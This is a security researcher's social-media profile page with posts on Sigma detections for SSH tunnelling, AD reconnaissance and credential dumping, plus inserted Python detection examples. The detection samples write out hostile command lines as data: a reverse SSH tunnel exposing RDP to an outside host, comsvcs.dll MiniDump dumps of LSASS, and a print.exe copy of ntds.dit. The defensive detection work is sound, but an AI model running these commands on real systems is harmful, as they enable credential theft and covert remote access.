Ayush Anand

551 posts


@Securityinbits

I tweet about my learning in Malware Analysis, Threat Intel, Detection Engineering and my DFIR journey. Opinions are mine only!

Join 150+ readers → Joined September 2015
292 Following, 1.5K Followers
Pinned Tweet
Ayush Anand @Securityinbits
Ever seen ssh.exe on a workstation and ignored it? Attackers abuse SSH remote tunneling to hide lateral movement and proxy traffic through the victim host.
- Simple Sigma rule "Port Forwarding Activity Via SSH.EXE"
- Correlating process and network events in MDE can expose the activity inside the tunnel.
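Added example, not code from the pinned post or the author's Sigma rule: a toy version of the two-step detection the post describes. Step 1 flags ssh.exe launched with a port-forwarding option (-R remote, -L local, -D dynamic/SOCKS); step 2 joins each hit to the network connections that process initiated so the remote peer and port are visible and can be allowlisted, which is the tuning-by-remote-IP approach mentioned in the replies. Field names imitate MDE's DeviceProcessEvents / DeviceNetworkEvents columns and every event is constructed sample data.

```python
"""
Added example (not from the original thread): ssh.exe port-forwarding
detection with process/network correlation over constructed events.
"""
import re
from collections import defaultdict

# Constructed telemetry: one ordinary ssh session, one reverse tunnel that
# publishes the victim's RDP port (3389) on an external host via port 443,
# and a cmd.exe line containing "-R" to show why the image filter matters.
PROCESS_EVENTS = [
    {"DeviceName": "WS01", "ProcessId": 4100, "FileName": "ssh.exe",
     "ProcessCommandLine": "ssh.exe admin@build01 uptime"},
    {"DeviceName": "WS01", "ProcessId": 4212, "FileName": "ssh.exe",
     "ProcessCommandLine": "ssh.exe -N -R 0.0.0.0:2222:127.0.0.1:3389 -p 443 u@203.0.113.10"},
    {"DeviceName": "WS01", "ProcessId": 4300, "FileName": "cmd.exe",
     "ProcessCommandLine": "cmd.exe /c dir -R"},
]
NETWORK_EVENTS = [
    {"DeviceName": "WS01", "InitiatingProcessId": 4100, "RemoteIP": "10.0.0.5", "RemotePort": 22},
    {"DeviceName": "WS01", "InitiatingProcessId": 4212, "RemoteIP": "203.0.113.10", "RemotePort": 443},
    {"DeviceName": "WS01", "InitiatingProcessId": 4212, "RemoteIP": "203.0.113.10", "RemotePort": 443},
]

# A forwarding option is a dash-prefixed option group whose last letter is
# R, L or D (so "-NR" counts), not followed by another letter. OpenSSH
# options are case-sensitive, so "-l user" does not match.
PORT_FORWARD_FLAG = re.compile(r"(?:^|\s)-(?P<flags>[A-Za-z]*[RLD])(?![A-Za-z])")
MODES = {"R": "remote", "L": "local", "D": "dynamic"}


def forwarding_mode(cmdline):
    """Return 'remote', 'local' or 'dynamic' for a forwarding command line, else None."""
    m = PORT_FORWARD_FLAG.search(cmdline)
    return MODES[m.group("flags")[-1]] if m else None


def detect_ssh_forwarding(process_events, network_events, known_ssh_servers=frozenset()):
    """Sigma-style match on ssh.exe + forwarding flag, enriched with the
    remote peers of that process (joined on DeviceName + ProcessId).

    A finding whose peers are all in known_ssh_servers is returned with
    suppressed=True instead of being dropped, so the tuning decision
    stays visible in the output.
    """
    peers = defaultdict(set)
    for n in network_events:
        peers[(n["DeviceName"], n["InitiatingProcessId"])].add((n["RemoteIP"], n["RemotePort"]))

    findings = []
    for p in process_events:
        if p["FileName"].lower() != "ssh.exe":
            continue  # the image filter keeps "-R" in unrelated command lines out
        mode = forwarding_mode(p["ProcessCommandLine"])
        if mode is None:
            continue
        remote = sorted(peers.get((p["DeviceName"], p["ProcessId"]), set()))
        suppressed = bool(remote) and all(ip in known_ssh_servers for ip, _ in remote)
        findings.append({
            "device": p["DeviceName"], "pid": p["ProcessId"], "mode": mode,
            "cmdline": p["ProcessCommandLine"], "remote_peers": remote,
            "suppressed": suppressed,
        })
    return findings


if __name__ == "__main__":
    for f in detect_ssh_forwarding(PROCESS_EVENTS, NETWORK_EVENTS, known_ssh_servers={"10.0.0.5"}):
        print(f)
```

Only the -R process is reported; the benign ssh session has no forwarding flag and the cmd.exe line is dropped by the image filter before the flag regex ever runs. Passing your bastion addresses as known_ssh_servers keeps the finding but marks it suppressed, so the allowlist stays auditable.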
Ayush Anand @Securityinbits
Sigma rules to detect the discovery/recon cmds:
- Potential Recon Activity Via Nltest.EXE
- Group Membership Reconnaissance Via Whoami.EXE
- Suspicious Group And Account Reconnaissance Activity Using Net.EXE
youtu.be/4xpP2yLYNoE
Ayush Anand @Securityinbits
nltest, whoami, net.exe. Individually normal. Together within seconds? That pattern often shows pre-ransomware AD discovery. I simulated it with Adaptix C2 and watched Sigma alerts fire in Elastic. Process tree tells the real story. Breakdown in the lab video. 👇
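Added example, not code from these posts or the author's Sigma rules: a sequence detection for the AD discovery burst described in the two posts above. Three single-event matchers approximate the three rule names listed earlier (nltest, whoami, net.exe recon); the correlator raises one alert when a host/user pair triggers at least three different matchers inside a short window and reports the parent image(s), so the process tree is part of the alert rather than something looked up afterwards. All events are constructed.

```python
"""
Added example (not from the original tweets): correlating individually
normal recon commands into one alert when they cluster within seconds.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Approximations of the three rules named in the earlier post; the real
# Sigma logic is not on this page. Case-insensitive, accepts "net1" too.
RECON_RULES = {
    "nltest_recon": re.compile(r"\bnltest(\.exe)?\s.*(/dclist|/domain_trusts|/dsgetdc)", re.I),
    "whoami_groups": re.compile(r"\bwhoami(\.exe)?\s.*(/groups|/all|/priv)", re.I),
    "net_group_recon": re.compile(r"\bnet1?(\.exe)?\s+(group|localgroup|user)\b.*(/dom|admin)", re.I),
}

# Constructed events: (timestamp, host, user, parent image, command line).
# WS07 shows the burst: a rundll32.exe parent (an injected beacon in this
# scenario) runs four recon commands in 12 seconds. The other lines are
# routine noise that a lone-command rule would also flag.
EVENTS = [
    ("2025-01-15T09:12:00", "WS01", "corp\\jdoe", "cmd.exe", "whoami /all"),
    ("2025-01-15T10:30:02", "WS07", "corp\\svc_backup", "rundll32.exe", "nltest /dclist:corp"),
    ("2025-01-15T10:30:05", "WS07", "corp\\svc_backup", "rundll32.exe", "whoami /groups"),
    ("2025-01-15T10:30:09", "WS07", "corp\\svc_backup", "rundll32.exe", 'net group "domain admins" /domain'),
    ("2025-01-15T10:30:14", "WS07", "corp\\svc_backup", "rundll32.exe", "net user /domain"),
    ("2025-01-15T10:31:00", "WS07", "corp\\svc_backup", "explorer.exe", "net use Z: \\\\fs01\\share"),
    ("2025-01-15T14:00:00", "WS07", "corp\\admin", "cmd.exe", "nltest /domain_trusts"),
]


def match_rules(cmdline):
    """Names of the single-event rules that fire on one command line."""
    return [name for name, rx in RECON_RULES.items() if rx.search(cmdline)]


def correlate_recon(events, window_seconds=60, min_distinct=3):
    """One alert per host/user whose recon hits cover >= min_distinct
    rules inside a sliding window of window_seconds. Hits are grouped
    per (host, user) so two admins on one box do not merge into a burst."""
    hits = []
    for ts, host, user, parent, cmd in events:
        for rule in match_rules(cmd):
            hits.append((datetime.fromisoformat(ts), host, user, parent, rule, cmd))
    hits.sort()

    by_actor = defaultdict(list)
    for h in hits:
        by_actor[(h[1], h[2])].append(h)

    alerts = []
    for (host, user), hs in by_actor.items():
        start = 0
        for end in range(len(hs)):
            while hs[end][0] - hs[start][0] > timedelta(seconds=window_seconds):
                start += 1
            window = hs[start:end + 1]
            rules = {h[4] for h in window}
            if len(rules) >= min_distinct:
                alerts.append({
                    "host": host, "user": user, "rules": rules,
                    "parents": {h[3] for h in window},
                    "commands": [h[5] for h in window],
                    "span_seconds": int((window[-1][0] - window[0][0]).total_seconds()),
                })
                break  # one alert per actor; the case holds the rest
    return alerts


if __name__ == "__main__":
    for a in correlate_recon(EVENTS):
        print(a)
```

The lone "whoami /all" on WS01 and the admin's single nltest on WS07 each fire a matcher but never reach the threshold; only the svc_backup burst does, and the alert carries rundll32.exe as the common parent, which is the detail that separates an operator-driven beacon from a scripted login task.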
Kostas @Kostastsale
Today I’m launching Threat Hunting Labs. Over the years I’ve analyzed many real-world intrusions. One thing became obvious: most training platforms don’t resemble how investigations actually happen. So I built something different. Threat Hunting Labs focuses on investigation-driven learning using real telemetry and structured investigative paths. If you want to get better at investigating breaches, you should practice investigating breaches. More details here: threathuntinglabs.com/blog/introduci…
Ayush Anand @Securityinbits
Still converting Sigma rules to Elastic one by one? 😵‍💫 Here's how I batch-converted entire rule packs into Kibana NDJSON in one shot.
🔹 sigma-cli setup
🔹 Understanding targets + pipelines
🔹 Using the elasticsearch backend
🔹 Exporting rules to NDJSON
securityinbits.com/detection-engi…
Ayush Anand @Securityinbits
@nas_bench KQL Query:
DeviceNetworkEvents
| where Timestamp > ago(1h)
| where InitiatingProcessFileName =~ "ssh.exe"
| where InitiatingProcessCommandLine contains "-R"
| order by Timestamp asc
Ayush Anand @Securityinbits
@HALNine9sRel1k Agree, there will be false positive. But we can tune those based on the remote IP.
Ayush Anand reposted
Karsten Hahn @struppigel
New blog: Using LLMs the right way for malware analysis 💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy. blog.gdatasoftware.com/2026/03/38381-…
Ayush Anand @Securityinbits
Think those AD discovery commands are just admin noise? That’s how Akira slips in.👀 I mapped common discovery cmds + classic LSASS dump via comsvcs.dll into focused Sigma rules. 6 detections that surface hands-on-keyboard before encryption starts.
I am Jakoby @I_Am_Jakoby
My 3rd and final stage of the job interview is tomorrow. Spoiler alert: I already know I'm getting the job. What does that mean for you guys? If you guessed that it means I'll be releasing all my PowerShell for hackers courses for free, you are correct. I'm proud of you. I don't care about being rich. I want to make sure my house is never in danger of being in foreclosure again, and I want to be able to spoil my 33 cats! Nothing else matters, and this job will guarantee both of those things. I've never been happier in my life. Not to mention I currently have 2 GitHub and 2 Microsoft bounties in triage and I stand to make some decent money. I'm blessed, and everyone should have access to education. This has always been the dream.
Ayush Anand @Securityinbits
@vxunderground Now someone will publish an article claiming AI boosted threat actor productivity and speed by 1000%. 😀
vx-underground @vxunderground
Sigh. Threat actors are using AI to do blog posts on threat actor forums. You can immediately tell by the grammar, the segments (what it does, how the chain works), and the chronic usage of the em dash.
Ayush Anand @Securityinbits
I wanted to know which ransomware TTPs defenders should actually prioritize. So I analyzed a ransomware.live dataset (unique victim per group). Result 👇
2025:
1. Qilin
2. Akira
3. Cl0p
4. Play
2026 YTD:
Qilin still #1
Akira dropped to #4
Ayush Anand @Securityinbits
Reading the same @TheDFIRReport again & again to understand for my upcoming YT video. Drew my first Excalidraw diagram inspired by @fr0gger_ -> Visual Threat Intelligence book - game changer for understanding & explaining attack chains clearly. Next time I’m starting with visuals right away 😀
Ayush Anand @Securityinbits
Saw Microsoft's blog on active SolarWinds Web Help Desk exploitation. Attackers dumping NTDS.dit... using print.exe. Wrote a simple Sigma rule → tested in my Elastic lab. Fires clean on the LOLBin abuse ✅
Detect this variant + similar print.exe abuse: Sigma rule 👇
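Added example, not code from the posts or the author's Sigma rules: two command-line detections of the kind the Akira post (LSASS dump via comsvcs.dll) and the post above (NTDS.dit via print.exe) describe, run over constructed process-creation events. Rule 1 catches rundll32 loading comsvcs.dll with the MiniDump export, by name or by ordinal #24. Rule 2 catches print.exe whose /D: target is a local file path instead of a printer, which turns the spooler client into a file copier (the LOLBAS-documented trick); a source path containing ntds.dit adds a second, higher-confidence hit. Field names follow the Sysmon/Sigma process_creation convention (Image, CommandLine); every command line is made up for the demo, and the real rules the tweets refer to are not on this page.

```python
"""
Added example (not from the original tweets): LOLBin command-line rules
for comsvcs.dll MiniDump and print.exe file copying, over constructed
process-creation events.
"""
import re

# comsvcs.dll exports MiniDump; rundll32 can call it by name or by
# ordinal (#24). Accept "comsvcs" with or without ".dll" and an optional
# comma between the DLL and the export, as rundll32 allows either form.
COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?\s*,?\s*(minidump|#24)\b", re.I)

# print.exe /D: normally names a printer (\\server\share or LPTn). A
# drive-letter path means the "print job" is written to a local file,
# i.e. a copy. Optional quotes around the target are tolerated.
PRINT_LOCAL_TARGET = re.compile(r'/D:\s*"?[A-Za-z]:\\', re.I)
NTDS_DIT = re.compile(r"ntds\.dit", re.I)

# Constructed events. The live NTDS.dit on a DC is locked, so the copied
# source here sits under a shadow-copy staging folder, as an attacker
# would have to arrange.
SAMPLE_EVENTS = [
    {"id": "print-benign", "Image": r"C:\Windows\System32\print.exe",
     "CommandLine": r"print.exe /D:\\printsrv\HP_Floor2 C:\Users\jdoe\report.txt"},
    {"id": "print-ntds", "Image": r"C:\Windows\System32\print.exe",
     "CommandLine": r"print.exe /D:C:\Windows\Temp\n.dit C:\Windows\Temp\vss\ntds.dit"},
    {"id": "comsvcs-named", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\lsass.dmp full"},
    {"id": "comsvcs-ordinal", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe comsvcs.dll #24 624 C:\Windows\Temp\l.dmp full"},
    {"id": "rundll32-benign", "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]


def run_rules(event):
    """Return the names of the rules that fire on one process_creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    hits = []
    # Not gated on Image: a renamed rundll32 still has to name comsvcs.
    if COMSVCS_MINIDUMP.search(cmd):
        hits.append("comsvcs_minidump")
    if image == "print.exe":
        if PRINT_LOCAL_TARGET.search(cmd):
            hits.append("print_exe_file_copy")
        if NTDS_DIT.search(cmd):
            hits.append("print_exe_ntds_dit")
    return hits


def scan(events):
    """Map each event id to the list of rule names that matched it."""
    return {e["id"]: run_rules(e) for e in events}


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(f"{event_id:16} {hits or '-'}")
```

The generic print.exe rule is the one to watch for false positives in environments that script print-to-file; the ntds.dit rule and the comsvcs rule should be close to noise-free, since neither command line has a routine administrative use.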